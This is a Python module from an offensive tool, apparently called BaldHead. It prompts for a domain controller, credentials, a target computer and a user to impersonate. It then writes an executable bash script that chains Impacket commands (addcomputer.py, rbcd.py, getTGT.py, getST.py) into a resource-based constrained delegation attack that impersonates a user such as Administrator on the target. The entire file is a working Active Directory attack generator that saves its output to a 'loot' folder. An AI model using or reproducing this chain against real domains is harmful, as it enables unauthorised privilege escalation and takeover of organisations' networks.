# modules/attack_rbcd.py

import os
from core.colors import blue, green
from datetime import datetime

def attack_rbcd(session, *args):
    print(blue("[*] Generating and saving full RBCD attack chain to a .sh file..."))

    domain = session.domain
    dc_ip = session.dc_ip
    username = session.username
    password = session.password or ''
    hash_val = session.hash or ''

    target = input("[?] Target computer name (e.g. DC01): ").strip().strip('$')
    attacker_pc = input("[?] Attacker computer name (e.g. FAKEBOX): ").strip().strip('$')
    attacker_pass = input("[?] Attacker computer password: ").strip()
    impersonate_user = input("[?] User to impersonate (e.g. Administrator): ").strip()

    fq_user = f"{domain}/{username}"
    fq_attacker = f"{domain}/{attacker_pc}$"
    timestamp = datetime.now().strftime("%Y%m%d-%H%M%S")
    script_name = f"loot/rbcd_{attacker_pc}_{target}_{timestamp}.sh"

    tgt_ccache = f"{attacker_pc}$.ccache"
    st_ccache = f"Administrator@cifs_{target.lower()}.{domain.lower()}@{domain.upper()}.ccache"

    commands = []

    commands.append("#!/bin/bash\n")
    commands.append(f"# Generated by BaldHead at {timestamp}\n")

    commands.append(f"# Step 1: Add attacker machine account")
    commands.append(f"addcomputer.py -method LDAPS -computer-name '{attacker_pc}$' -computer-pass '{attacker_pass}' -dc-ip {dc_ip} -domain-netbios {domain} {fq_user}:'{password}'\n")

    commands.append(f"# Step 2: Configure RBCD delegation")
    commands.append(f"rbcd.py -delegate-from '{attacker_pc}$' -delegate-to '{target}$' -action write {fq_user}:'{password}' -dc-ip {dc_ip}\n")

    commands.append(f"# Step 3: Get a TGT for the attacker computer")
    commands.append(f"getTGT.py {fq_attacker}:'{attacker_pass}' -dc-ip {dc_ip}")
    commands.append(f"export KRB5CCNAME={tgt_ccache}\n")

    commands.append(f"# Step 4: Request Service Ticket to impersonate {impersonate_user}")
    commands.append(f"getST.py -spn 'cifs/{target.lower()}.{domain.lower()}' -impersonate {impersonate_user} {fq_attacker}:'{attacker_pass}' -dc-ip {dc_ip}")
    commands.append(f"export KRB5CCNAME={st_ccache}\n")


    # Save to file
    with open(script_name, "w") as f:
        f.write("\n".join(commands))
    os.chmod(script_name, 0o755)

    print(green(f"[+] Full RBCD attack script saved to: {script_name}"))
    print(green(f"[+] Run: ./{script_name}"))
